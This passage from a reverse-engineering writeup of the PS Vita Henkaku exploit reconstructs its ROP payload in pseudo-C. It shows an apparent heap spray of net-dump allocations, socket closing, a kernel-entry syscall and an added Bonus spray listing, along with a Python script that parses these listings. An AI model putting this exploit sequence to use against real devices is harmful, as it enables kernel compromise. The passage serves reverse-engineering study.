sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000); sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);

// Start "mhm" thread
// Thread arguments are loaded into R1 and the gadget
// at the thread's entrypoint then loads register values
// from it, overwriting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

// Delay thread
sceKernelDelayThread(1500000);

// Close no longer needed sockets
sceNetSyscallClose(x_stack + 0x00008470);
sceNetSyscallClose(x_stack + 0x00008478);
sceNetSyscallClose(x_stack + 0x00008480);
sceNetSyscallClose(x_stack + 0x00008488);
sceNetSyscallClose(x_stack + 0x00008490);
sceNetSyscallClose(x_stack + 0x00008498);
sceNetSyscallClose(x_stack + 0x000084A0);
sceNetSyscallClose(x_stack + 0x000084A8);
sceNetSyscallClose(x_stack + 0x000084B0);
sceNetSyscallClose(x_stack + 0x000084B8);
sceNetSyscallClose(x_stack + 0x000084C0);
sceNetSyscallClose(x_stack + 0x000084C8);
sceNetSyscallClose(x_stack + 0x000084D0);
sceNetSyscallClose(x_stack + 0x000084D8);
sceNetSyscallClose(x_stack + 0x000084E0);
sceNetSyscallClose(x_stack + 0x000084E8);
sceNetSyscallClose(x_stack + 0x000084F0);
sceNetSyscallClose(x_stack + 0x000084F8);
sceNetSyscallClose(x_stack + 0x00008500);
sceNetSyscallClose(x_stack + 0x00008508);
sceNetSyscallClose(x_stack + 0x00008510);
sceNetSyscallClose(x_stack + 0x00008518);
sceNetSyscallClose(x_stack + 0x00008520);
sceNetSyscallClose(x_stack + 0x00008528);
sceNetSyscallClose(x_stack + 0x00008530);
sceNetSyscallClose(x_stack + 0x00008538);
sceNetSyscallClose(x_stack + 0x00008540);
sceNetSyscallClose(x_stack + 0x00008548);
sceNetSyscallClose(x_stack + 0x00008550);
sceNetSyscallClose(x_stack + 0x00008558);
sceNetSyscallClose(x_stack + 0x00008560);
sceNetSyscallClose(x_stack + 0x00008568);
sceNetSyscallClose(x_stack + 0x00008570);
sceNetSyscallClose(x_stack + 0x00008578);
sceNetSyscallClose(x_stack + 0x00008580);
sceNetSyscallClose(x_stack + 0x00008588);
sceNetSyscallClose(x_stack + 0x00008590);
sceNetSyscallClose(x_stack + 0x00008598);
sceNetSyscallClose(x_stack + 0x000085A0);
sceNetSyscallClose(x_stack + 0x000085A8);
sceNetSyscallClose(x_stack + 0x000085C4);

// Break into kernel space
sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);

// Destroy another dump
sceNetDumpDestroy(x_stack + 0x000085DC);

// Delay for a while
sceKernelDelayThread(1000000);

// Calculate a SceWebkit pointer using the ioctl
// from "mhm" thread (kernel space?)
r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;

// Unknown
sceWebkit_123();
sceWebkit_CF481();

// Destroy specific dumps (constant IDs)
sceNetDumpDestroy(0x00001770);
sceNetDumpDestroy(0x00001771);
sceNetDumpDestroy(0x00001772);
sceNetDumpDestroy(0x00001773);
sceNetDumpDestroy(0x00001774);
sceNetDumpDestroy(0x00001775);
sceNetDumpDestroy(0x00001776);
sceNetDumpDestroy(0x00001777);
sceNetDumpDestroy(0x00001778);
sceNetDumpDestroy(0x00001779);
sceNetDumpDestroy(0x0000177A);
sceNetDumpDestroy(0x0000177B);
sceNetDumpDestroy(0x0000177C);
sceNetDumpDestroy(0x0000177D);
sceNetDumpDestroy(0x0000177E);
sceNetDumpDestroy(0x0000177F);
sceNetDumpDestroy(0x00001780);
sceNetDumpDestroy(0x00001781);
sceNetDumpDestroy(0x00001782);
sceNetDumpDestroy(0x00001783);
sceNetDumpDestroy(0x00001784);
sceNetDumpDestroy(0x00001785);
sceNetDumpDestroy(0x00001786);
sceNetDumpDestroy(0x00001787);
sceNetDumpDestroy(0x00001788);
sceNetDumpDestroy(0x00001789);
sceNetDumpDestroy(0x0000178A);
sceNetDumpDestroy(0x0000178B);
sceNetDumpDestroy(0x0000178C);
sceNetDumpDestroy(0x0000178D);
sceNetDumpDestroy(0x0000178E);
sceNetDumpDestroy(0x0000178F);
sceNetDumpDestroy(0x00001790);

// Deadlock
sceWebkit_519(0x00000000);
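The listing above (and the Bonus listing further down) is hard to read once extraction has run the calls together, so here is an added analysis helper, written for this wiki and not part of H.'s writeup or of the Henkaku code: it parses the pseudo-C calls, counts them per function and reconstructs the descending sceNetDumpCreate size staircase, flagging skipped sizes such as the missing 0xC5C00 in the Bonus listing. It assumes only the textual format shown on the page; the embedded sample is an excerpt of those listings assembled so the script runs offline.

```python
"""Parse the flattened pseudo-C call listing reproduced on this page and
summarise the sceNetDumpCreate allocation staircase.

Added analysis helper, not part of H.'s writeup or of the Henkaku code; it
assumes only the textual format of the listing: `name(args);` with hex
literals, optionally preceded by `0x00(x_stack + ...) =` and `//` comments.
"""
import re
from collections import Counter

# One pseudo-call: an sce* name, an argument list without nested parentheses
# and without string literals (so commented prototypes such as
# sceNetDumpCreate("ddd", ...) are ignored), terminated by ");".
CALL_RE = re.compile(r'(sce\w+)\(([^()"]*)\);')
HEX_RE = re.compile(r"0x[0-9A-Fa-f]+")

# Constructed sample: an excerpt of the second-payload listing and of the
# Bonus listing on this page, joined so the script runs offline.
SAMPLE = """\
// sceNetSocket("tst", AF_INET, 0x7, 0); 0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);
// Create several net dumps // sceNetDumpCreate("ddd", 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000); 0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);
// Destroy some dumps sceNetDumpDestroy(x_stack + 0x000085F4);
// Create more net dumps sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000); sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5A00, 0x00000000);
// Deadlock sceWebkit_519(0x00000000);
"""


def parse_calls(listing):
    """Return [(function_name, [int, ...])] for every call in listing order.

    Expressions such as `x_stack + 0x0001062C` keep only their hex literal,
    which is enough to recover the stack offset or the size argument.
    """
    calls = []
    for name, argstr in CALL_RE.findall(listing):
        args = [int(h, 16) for h in HEX_RE.findall(argstr)]
        calls.append((name, args))
    return calls


def dump_sizes(calls):
    """Sizes requested by each sceNetDumpCreate(name, size, flags), in order."""
    return [args[1] for name, args in calls
            if name == "sceNetDumpCreate" and len(args) >= 3]


def descending_runs(sizes, step=0x100, max_hole=1):
    """Group consecutive sizes that step down by `step`.

    A run tolerates up to `max_hole` skipped sizes between neighbours and
    records them in `holes`, so the analyst sees both the staircase and
    the few sizes that were left out of it.
    """
    runs = []
    for size in sizes:
        if runs:
            run = runs[-1]
            diff = run["end"] - size
            if diff > 0 and diff % step == 0 and diff // step - 1 <= max_hole:
                # every size strictly between the previous one and this one
                run["holes"].extend(range(run["end"] - step, size, -step))
                run["end"] = size
                run["count"] += 1
                continue
        runs.append({"start": size, "end": size, "count": 1, "holes": []})
    return runs


def summarise(listing):
    """Counts per function, the dump-size sequence and its descending runs."""
    calls = parse_calls(listing)
    sizes = dump_sizes(calls)
    return {
        "counts": Counter(name for name, _ in calls),
        "dump_sizes": sizes,
        "runs": descending_runs(sizes),
    }


if __name__ == "__main__":
    report = summarise(SAMPLE)
    for name, n in sorted(report["counts"].items()):
        print(f"{name:24s} x{n}")
    for run in report["runs"]:
        holes = ", ".join(f"0x{h:X}" for h in run["holes"]) or "none"
        print(f"run 0x{run['start']:X} -> 0x{run['end']:X}: "
              f"{run['count']} dumps, holes: {holes}")
```

Feed it the full page text instead of SAMPLE to get the complete staircase and every hole in both listings.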


- Stage 4 (kernel ROP): The second ROP payload prepares the stage for a kernel attack. After it's done, another ROP chain should be starting on the kernel side. This chain relies on kernel pointers that were leaked during the second payload's execution and is built beforehand. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.

To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the data region.



To be continued...

~ H.

Bonus!

After the exploit was updated to support dynarec and a "special surprise", the second payload was changed and the following was added:

// Old code ...

sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C5000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C4000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3F00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C3000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C2000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1E00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C1000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000C0000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFD00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BFA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BF000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BED00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BEA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BE000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDE00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BDA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BD000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BCA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BC000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBF00, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BBA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BB000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAF00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAE00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAD00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAC00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAB00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BAA00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000BA000, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B9000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8100, 0x00000000); 
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B8000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7200, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B7000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6F00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6E00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6D00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6C00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6B00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6A00, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6900, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6800, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6700, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6600, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6500, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6400, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000B6200, 0x00000000); 
